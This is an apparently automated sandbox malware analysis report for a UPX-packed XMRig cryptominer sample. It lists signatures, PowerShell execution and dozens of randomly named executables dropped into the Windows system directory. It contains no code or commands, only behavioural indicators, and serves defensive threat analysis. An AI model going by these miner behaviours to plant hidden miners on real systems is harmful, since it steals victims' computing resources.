Malware Analysis Report

2024-11-16 12:08

Sample ID 240610-tnw6rasfra
Target b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a
SHA256 b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a

Threat Level: Known bad

The file b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Detects executables containing URLs to raw contents of a Github gist

Xmrig family

xmrig

UPX dump on OEP (original entry point)

XMRig Miner payload

UPX dump on OEP (original entry point)

Detects executables containing URLs to raw contents of a Github gist

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

UPX packed file

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-10 16:12

Signatures

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-10 16:12

Reported

2024-06-10 16:15

Platform

win7-20240419-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe"

Signatures

xmrig

miner xmrig

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\gwDhgEH.exe N/A
N/A N/A C:\Windows\System\vUqXqTJ.exe N/A
N/A N/A C:\Windows\System\oueWjMz.exe N/A
N/A N/A C:\Windows\System\vzkpmHb.exe N/A
N/A N/A C:\Windows\System\BVNhYjx.exe N/A
N/A N/A C:\Windows\System\tcVDcoQ.exe N/A
N/A N/A C:\Windows\System\OBXtOmz.exe N/A
N/A N/A C:\Windows\System\bVtUqHB.exe N/A
N/A N/A C:\Windows\System\AMxfcae.exe N/A
N/A N/A C:\Windows\System\vtoJjFe.exe N/A
N/A N/A C:\Windows\System\MqkecDl.exe N/A
N/A N/A C:\Windows\System\oeTuQMk.exe N/A
N/A N/A C:\Windows\System\EMAWpwV.exe N/A
N/A N/A C:\Windows\System\EPsJjaV.exe N/A
N/A N/A C:\Windows\System\qdhsgRZ.exe N/A
N/A N/A C:\Windows\System\FqhLzMz.exe N/A
N/A N/A C:\Windows\System\EnBLHui.exe N/A
N/A N/A C:\Windows\System\LIGHBtG.exe N/A
N/A N/A C:\Windows\System\GkOisHl.exe N/A
N/A N/A C:\Windows\System\ETcnPOG.exe N/A
N/A N/A C:\Windows\System\shQLvWE.exe N/A
N/A N/A C:\Windows\System\dnutkiA.exe N/A
N/A N/A C:\Windows\System\KQQYbkt.exe N/A
N/A N/A C:\Windows\System\NkIPqEY.exe N/A
N/A N/A C:\Windows\System\BUeDGoz.exe N/A
N/A N/A C:\Windows\System\PwOMdqU.exe N/A
N/A N/A C:\Windows\System\BWtVrYg.exe N/A
N/A N/A C:\Windows\System\GzLIxKC.exe N/A
N/A N/A C:\Windows\System\ufOpfGC.exe N/A
N/A N/A C:\Windows\System\QKpojNv.exe N/A
N/A N/A C:\Windows\System\YqCPLyS.exe N/A
N/A N/A C:\Windows\System\ZQrXklD.exe N/A
N/A N/A C:\Windows\System\KrZrbUt.exe N/A
N/A N/A C:\Windows\System\qHtqYWP.exe N/A
N/A N/A C:\Windows\System\jXklBFl.exe N/A
N/A N/A C:\Windows\System\YcrXTHw.exe N/A
N/A N/A C:\Windows\System\qyEmSBj.exe N/A
N/A N/A C:\Windows\System\MfOnrNc.exe N/A
N/A N/A C:\Windows\System\QavBcrH.exe N/A
N/A N/A C:\Windows\System\JOGgMqb.exe N/A
N/A N/A C:\Windows\System\gxQVNww.exe N/A
N/A N/A C:\Windows\System\pOLtOwR.exe N/A
N/A N/A C:\Windows\System\vSPtgug.exe N/A
N/A N/A C:\Windows\System\hULnGnn.exe N/A
N/A N/A C:\Windows\System\cpgYxrD.exe N/A
N/A N/A C:\Windows\System\cXHBzCL.exe N/A
N/A N/A C:\Windows\System\WQdreIS.exe N/A
N/A N/A C:\Windows\System\IgbVKEm.exe N/A
N/A N/A C:\Windows\System\FyxgfiN.exe N/A
N/A N/A C:\Windows\System\ExnBwtf.exe N/A
N/A N/A C:\Windows\System\lSXIFUw.exe N/A
N/A N/A C:\Windows\System\mdVpXzR.exe N/A
N/A N/A C:\Windows\System\kDBMeFl.exe N/A
N/A N/A C:\Windows\System\UAKCPCp.exe N/A
N/A N/A C:\Windows\System\GbUbymG.exe N/A
N/A N/A C:\Windows\System\tKrTalM.exe N/A
N/A N/A C:\Windows\System\BoThWjO.exe N/A
N/A N/A C:\Windows\System\yjdfDfo.exe N/A
N/A N/A C:\Windows\System\BZQrZqo.exe N/A
N/A N/A C:\Windows\System\kTVxCEO.exe N/A
N/A N/A C:\Windows\System\zWlXpDM.exe N/A
N/A N/A C:\Windows\System\oRnzphC.exe N/A
N/A N/A C:\Windows\System\GBzpEaR.exe N/A
N/A N/A C:\Windows\System\WHCarXp.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\CQMRbyy.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\iCCkTYv.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\NSCrPhB.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\wBbnVQn.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\QjuapLC.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\hoMbZIs.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\fDEBQPX.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\RxFVCDC.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\tVeAVTX.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\kpqXmne.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\DqyYHAe.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\WZRNsNg.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\SQSHUqt.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\vTcxczY.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\VbVYAKa.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\ksQZOxq.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\jJrOonG.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\KnoOsDz.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\nVBAtnC.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\ORvnRDm.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\VVncetG.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\jwGBcTk.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\rhMXufc.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\XrjKsnH.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\zcRvWUz.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\oTsGESO.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\XFMsjyL.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\aWVaAnN.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\HqALqaE.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\ngheTYo.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\EldguCw.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\iQdPsxE.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\BkXommH.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\ZloZzMS.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\GvgHsBr.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\bIvDnUG.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\jVOwero.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\IgbVKEm.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\IwGqfqE.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\VEQlebV.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\ZOLYbEl.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\ALRqzPN.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\xileLlW.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\bxIsgdi.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\mpfdBwU.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\uBnrHFQ.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\bocuBYk.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\qAHgcbn.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\ymoeZLr.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\SvZZUqA.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\LyzFEDh.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\iRPwHnX.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\VbLJOXK.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\HIWOmzN.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\EYfTlXR.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\knoCHNk.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\UYctauk.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\tvBtiuI.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\SkDNGPy.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\XqfVbWl.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\zJoaKef.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\gisTOPH.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
